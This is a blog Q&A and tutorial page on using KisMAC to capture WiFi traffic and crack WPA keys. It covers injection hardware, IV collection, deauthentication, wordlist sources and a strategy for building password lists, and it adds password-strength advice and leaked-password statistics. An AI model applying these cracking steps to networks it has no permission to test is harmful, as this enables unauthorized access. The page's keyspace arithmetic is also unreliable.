Mac Tips and "How To" On a Mac: Kismac Tutorial

KisMAC Q&A

Please, before asking, be sure to read the all stuff. Answering 5 times the same questions is time consuming.
There is a "Search" for the blog on the top left corner. Thanks!

ALL QUESTIONS WITHOUT KisMAC Version and OS Full Version will be ignored or Flamed. Include Model and FCC number of the Network Adapter (the USB thingy) if applicable. And YES the FCC number is on it! and NO, it's not the MAC address.

Image courtesy of Belkin

Example:
Kismac + OS X = Ignored

FCC ID : MAC 01:23:12:20:ff:88 = Ignored
KisMAC 0.3 + OS X 10.6.4 = Answered
Kysmaxx + win 95 = Flamed

Question:
"I got a pbm to get a wpa key.
I got the data packets ok, I get the green light with the deauthentification, but when I ask to find the wpa I get this:
"the wpa key could not be recovered because of the following reason: the key was none of the tested passwords.."

Answer:
The file used needs to have the exact password in it. The words are tested "as is" and not in combination.
Example: the password is "I love Kismac"
If your dictionary contains the words "I" + "love" + "Kismac" it will NOT work, your dictionary must contain the exact "I love Kismac" as a word to successfully attempt to crack.
Be also sure to use a proper formatted file: a simple .txt will work perfectly.

-----------------

Question:
2 questions :
- to crak wpa key what kind of USB device i need ? (name please)
- what does mean dictionnary file !??!

Answer:
Dictionary file OR Wordlist are files containing simple words or sentences to be tried against the key. They often contain 100,000's of words related to a subject, i.e. last names, first names, Yiddish words, bacteria, etc .. You can also find the 500 most used passwords
Or take a list and expand it by modification or concatenation*

Excel wordlist expander
link posted : http://aloah.free.fr/Mactips/home_En.html

*Concatenate: to add strings together. "qwerty" +"1234"= "qwerty1234"

-----------------

Question:
I can't collect IV's

Answer:
Look at the troubleshooting article, multiple answers posted

-----------------

Question:
what kind of USB device i need?

Answer:
Already posted multiple times

-----------------

Question:
I can't seems to be able to collect IV's / IV's Collection is very slow

Answer:
You need to look first at the number of packets collected:
Packets
Data Packets
Management Packets
Control Packets
Unique IV

We are looking at the ratio between Packets and Data Packets. Data Packets is the good stuff.
If you have a lot of packets with a lot of Management packets, it means that you are listening to a non-active network. A bit like if you listen to static on radio: Nothing good to listen to.

To give you an example, I have at home multiple WiFi Devices. Some are Wireless Backup HDD.
So, if you come near buy, you'll see multiple network. The Issue is that the Wireless Backup is NOT connected to the internet, and only "working" when I am doing a backup. So you could listen for a long time, getting management packets, but zero IV's, and very little good stuff.

The Other issue could be that everything is ok, but the connection is not very active. Somebody left the computer on and went to work. Almost no traffic. Packets collection is going to be slow.

What injection device should I use?
-The list of “approved” hardware is here: http://trac.kismac-ng.org/wiki/HardwareList
I have tried the Edimax EW-7318 USg, Hawking HWUG1 & HWUG1A (about $40)
The KisMAC Team highly recommends the Alfa AWUS036H (about $50)
I am not really impressed by the sensitivity of the Hawking “as is”, you may want to consider a high gain antenna, or the Alfa AWUS036H for better results.
I’ll try the Hawking with a directional antenna and post results, if any.

------------------

Question:
Can I use KisMAC with XP?

Answer:
Dear,
I am surprised: how can you write if you can't read? Are you two? one can read, one can write?
If so, ask your twin for an answer.

-----------------

Question:

J said...: hi there, congrats for the nice job here.... i woud like to ask you if on a MBP I get a usb device rt73 Hawking HWUG1 for ex, do I need to install subversion, xcode and compile kismac explained on this link? http://screammy.name/projects/kismacmacbook/ I really hope not.... :) Will you advice me about the USB devise "rt73 Hawking HWUG1 "and "rt73 Hawking HWUG1A" , whats the diference between them and your opinion about this USB DEVICE "D-link DWL-G122? This blog will be from now on my favorites... Thanks in advance and keep the good work J. Answer(s)..
Hey J, thanks for the cheer up.
Do I need to Compile KisMAC? ABZOLUTELY NOT
the post on screammy.name is from 2006 (updated in 2007) ... KisMAC has evolved ...
~~"The current distribution of KisMAC does not allow you to use the AirPort Extreme card in passive mode"~~ Yes it does...
Assuming that your are on OS X 10.5 or 10.6, Just download the version 0.2.99 available by link here:
http://aloah.free.fr/mactips/Menu.html Via the Download Menu; Then Watch the video "how to" http://www.youtube.com/watch?v=lBGN5OGCPgI
Watch Again. (specially the warning) If you don't, you WILL be sorry. Breath, take a break, and watch again.
Hawking To the best of my knowledge, the difference between the two are: one is 11g and the 1A is 11n.; As for Hardware, what you want to be sure about is the chipset.; The chipset is the "engine" Never mind the body, you care about the engine.; hint: double check the FCC number (and you'll realize that different brands have the same engine); If you buy a non compatible....Kiss good bye to your $ D-link DWL-G122 has different revisions number : http://trac.kismac-ng.org/wiki/DWL-G122 So, I would apply the following formula: (CFU x D) -MS ^SOL; CFU = Chances of F* up; D= Distance; MS= Money saved; SOL= Shit out of luck factor.; In Short: Save 10 bucks to be in trouble and re-ship the all stuff and wait 2 weeks. Do not get your money back for the shipping, and get upset because "I did not know"...; Hawking, Edimax, Alpha or anything known to work without issues .... ;-); I suppose you will read the troubleshooting and Q&A completely. You will save a great amount of time by doing so. How much time? Well, can you do it is less than 4 seconds?; Queries from Goog Analyticskismac ch/re >> Green, Orange or Red. All others colors are products of your imagination. - This is your way of asking a question - direct from the search bar in Google. If you have arrived here, it's probably because your question was formulated in a strange way, but you are very close to an answer, just use the search on the top left of the blog. I'll provide very short answers below Injection Airport Extreme >> Airport extreme can NOT inject or Re-Inject kismac could not attach to the apple airport driver >> 99% chance it's your fault. look into "Preferences" Kismac injection does not work >> Test injection (Command + T) Kismac injection not working >> Test injection (Command + T) kismac weak scheduling attack taking long time >> Look at troubleshooting kismac ew-7318usg tutorial rt73.plist >> App Cleaner ?? mac uninstall kismac >> App Cleaner + Plist Question: ..I have an issue with KisMAC "hanging" for some minutes in a specific channel... it's not always the same, but 'till this moment it has only happened with ch 11, 12, 13 and 14... the other channels pass fast, but on these channels it "hangs" for some minutes and then continues the scan... Answer: Uncheck the Channels 12, 13 and 14. Those channels are not used in most countries and it can create interferences: You are probably trying to listen to a microwave oven or an old cordless phone.

KisMAC Resources, Wordlist, Dictionary files

Is there a KisMAC Tutorial?
Yes, a Video tutorial and a written one. Also a troubleshooting one and a debugger in progress. it's here: http://tinyurl.com/nxdcsd

What injection device should I use?
Definitely this one:
Best Wifi Card for KisMac about 20 X more powerful than Airport or Hawking

This card is a winner hands down!
Mentioning a Hawking or an Edimax as "competition" is a pure act of charity.

Otherwise, The list of “approved” hardware is here: http://trac.kismac-ng.org/wiki/HardwareList
I have tried the Edimax EW-7318 USg, Hawking HWUG1 & HWUG1A (about $40)
I am not really impressed by the sensitivity of the Hawking “as is”, nor by the Edimax.
After few tests and compared to the one mentioned above in "best card" I would not consider buying them again.

Nota Bene:
KisMAC will try every word (from the list provided) to attempt to crack the key, hence it may take a lot of time....if you have a slow machine, be really patient.
I have a not so bad machine, and I run about 170 words per second. You can leave a comment with your config and speed for me to compare.
Mine: MacBook Pro 2.5GHz Intel Core 2 Duo + 4GB DDR2 SDRAM : about 170 Word/sec

Can you find listing or maps of available networks?
-Yes you can, check the Wigle Webpage http://wigle.net

How to uninstall Drivers ? Plist?
Your best shot at uninstalling Plist is to use the free App called "App Cleaner"
You'll find the link, directions, etc, on the blog (left hand side)
If you have installed the drivers provided with a CD for a specific chipset, you will need:
The Admin Rights, the use of Terminal, and you'll need to unload the driver before removing it. Unloading the driver only works for one session: When you'll reboot, the driver will be loaded again.

How to select a single channel?
Take a look at "Step B", the picture shows "all channel selected"
you just have to click on "none" and the check the single channel wanted
you can also use directly the tab "Channel"

I am a Super Geek, is there something more powerful than KisMAC?
Aircrack-ng (Reserved for Advanced User)
How to install Aircrack on a Mac : http://easymactips.blogspot.com/2010/10/how-to-install-aircrack-on-mac.html
Wireshark is also a powerful one, but no so friendly for the beginner

Passwords Lists

One of the best is here:
http://easymactips.blogspot.com/2009/11/support-donate.html

Worst password list: Please, don't use them .....;-) they are often the first checked ....
http://aloah.free.fr/mactips/Wordlists.html
http://trac.kismac-ng.org/wiki/wordlists

List of Dictionary files or Wordlist / Wordlists
Sometimes called wordkey or word key (as per the results of your queries via Google Analytics
for WPA attack:
http://aloah.free.fr/mactips/Wordlists.html
http://trac.kismac-ng.org/wiki/wordlists
or you can compile your own.
I may suggest you to skip passwords of 1,2,3 & 4 characters, very few people use 3 ch passwords... A bruteforce attack will not take a long time on 3 ch....
WPA:
Minimum 8ch, so you can skip all pswd of less than 8 characters.

Note on dictionary files:
the words are tested "as is" and not in combination.
Example: the password is "I love Kismac"
If your dictionary contains the words "I" + "love" + "Kismac" it will NOT work, your dictionary must contain the exact "I love Kismac" as a word to successfully attempt to crack.

This is the only way to end with a successful attack is to use a dictionary containing the (exact) word(s).
Pure Brute Force attacks do NOT work with KisMAC (trying every single combination starting at "a" then "aa", "aaa", etc) You need to provide KisMAC with a dictionary file, format TXT, with an empty line at the end.

Passwords hints
A Dictionary attack uses a list of existing words. Often those lists are all lowercase or mixed, in English, and use "common" words
the more complex is your password, the greater is the chance that it will take a mind-boggling and un-human length of CPU time to try all the possible combination. (million of years)
If you use Kismac on a WPA attack, the only way to end with a successful attack is to use a dictionary containing the (exact) word.
Brute Force attacks do NOT work with KisMAC
As a possible target of WPA attack, "I", use stupid-strength passwords on full ASCII.
I do not use English words, or any common language, and I use lots of $igns and numbers.
So, how patient is the attacker?

Memotechnic tips
Instead of your "123456" dummy password you can use an HARD TO GUESS word and add numbers to it PLUS a second set of numbers while holding the "Shift" key
Example: the maiden name of your mom is Kismac, her Bday is 07 12 1962
you got a "07121962Kismac)&_!@_!(^@"
You just have a 20 Ch length password that you can easily retain.
As KisMac does not use pure Bruteforce to crack WPA, you are pretty safe with a password like this. finding such a word a in dictionary would be...surprising.
Be aware that you can find list of names, towns, zipcodes, etc . So, using "Smith" or "Boston" is not really foolproof

Even in the improbable case of a very, very tenacious "auditor", a 20 character full ASCII password (255 characters possibility) is up to 20^255 possibilities.
How big is 20^255?
well, that's: 1,351,461,283,755,590,000,000,000,000,000,000,000,000,000,000,000
it's already stupid strong. Unless you are the NSA, it's probably out of your reach:

Update on Oct 6 2009.
You may have heard of the Yahoo! password heist*.
*(Dec 2009: Forget the Yahoo! heist, a bunch of highly educated monkeys running a website have left their entire database of passwords in clear plain text. The result is 32,000,000 passwords and login stolen. More on that later....)

10,000 passwords and emails listed on the web, plus another 30,000 accounts of Gmail and Comcast compromised.
According to serious sources, the list was a possible snippet of 250,000 email and password for resale.
Email? not a big deal, huh? who cares? they just need to go to your online banking, and reset the password. They will get the message. You won't ....
I could not access the list on time, but the excellent Reusable Security Blog did
Here is his (Matt Weir) analysis about what you use

So on to the analysis:

Total Passwords: 9,845 - This number excludes all the e-mail addresses that had blank passwords
Average Password Length: 8.7 characters long
Percentage that contained an UPPERCASE letter: 7.2%
Percentage that contained a special, (aka !@#$), character: 5.2%
Percentage that contained a digit: 51.7%
Percentage that only contained lowercase letters: 43.3%
Percentage that only contained digits: 17.6%
Percentage the started with a digit, (aka '1password'): 25.0%
Percentage that ended with a digit, (aka 'password1'): 44.1%
Percentage that started with a special character: 0.5%
Percentage that ended with a special character: 2.2%
Percentage that started with an uppercase letter: 6.1%

Overall letter frequency analysis:

aeoi1r0ln2st9mc83765u4dbpghyvfkjAzEIOxRLwSNq.MTC_DB-UP*G@H/ZYF+VJK,\$&X!Q=W?'#")(%^][}< {`>

First character, letter frequency analysis:

a1mbc2sp0lterdjfgn3hi6k759vo48yAwMzBSCuqPLExJRTFDGNV*HOZYKI\W@/-+(.$U&?Q^[,#

Last character, letter frequency analysis:

aos01326e57849nrilydzmtuAhbO.gck*SxpfE@+LvjNRw_-I?/$q!ZX)YKH"UPMDCB#GF'&%}T,]\VJ(

As a repeat, the previous is from Matt Weir, from Reusable Security

So, it tells me that there are still a large number of people using password vulnerable to dictionary attacks.
Furthermore:
40% of users are using the same password for everything.
92.7% did not use an UPPERCASE
94.8% did not use a special character
and the best: Only contained digits: 17.6%
Average length 8.7 >> rounded to 9 Characters
For the 18% (of dummies) that only use digit:
Digit only = 10 possibility per Ch. 9Ch long = 10^9 = 1,000,000,000 possible combination
Realistic number of test before cracking: 50% (10^4.5)
Time to crack : 0,015 hour = Joke
For those 18%, Read this carefully:
"Neil O'Neil, a digital forensics investigator at secure payments firm The Logic Group, found that "123456" cropped up on the list 64 times. There were 18 uses of the second most popular password, "123456789",
Big surprise!!! Just like the ones mentioned in the 500 most used password. Can you guess what was the #3 and 4#? probably 1234567 and 12345678.
the 500 most used passwords is 4 or 5 yrs old, but it seems like it was brand new.
#1 to #10: 123456,password, 12345678,1234, pussy , 12345, dragon , qwerty , 696969, mustang

So, if I had to create a password list, guess what ..
First on the list would be 8 or 9 Ch long, all digit, then all lowercase, then adding a digit or 2 first, then adding a digit or 2 last.
That list It should cover about 80% of all password.
That would be a big list of 7,518,774,324,736 possibilities, but it would cover 80% of the general public. Not bad.
So, GET A REAL PASSWORD!

Because it's raining and I am bored:
Let 's assume a cluster of 10,000 Macbook Pro, dual core etc, working all together for you (distributed):
A Mac Book Pro, on intensive uses 263 Watt and generates 894 BTU/h output of heat
Cracking possibilities : up to 10,000,000 pswd /second/computer
If you do the math, you'll realize that cracking by brute force a 20 characters Full ASCII password will cost you up to 40 million dollars worth of electricity, create enough BTU to generate a heat wave the size of Texas and take you hundred of thousands of years.
You could hit the jackpot and find the pswd within minutes, but generally, it will take 50% of the maximum time possible to break a password
This is the reason why Keyloggers, Phishing and Clickjacking were invented. That's were, in my opinion, where the real danger is ...

Kismac for Windows
I am not aware of a Windows version of KisMAC (KisDOWS???) , nevertheless, you can Google NetStumbler, Aircrack, Airsnort, etc..
To the best of my knowledge, NetStumbler does not have cracking capabilities, nor the capabilities to uncloak hidden or deauthenticate networks.
If you want serious power, you'll need to forget about Windows (breaking news, huh?) and move on to Linux with Aircrack-ng
If you download a (working) version of KisMAC for Windows, please let me know.
If you download one, especialy from a torrent, I am suggesting you to be VERY careful and scan the file left, right up and down for viruses or malware. ( hint )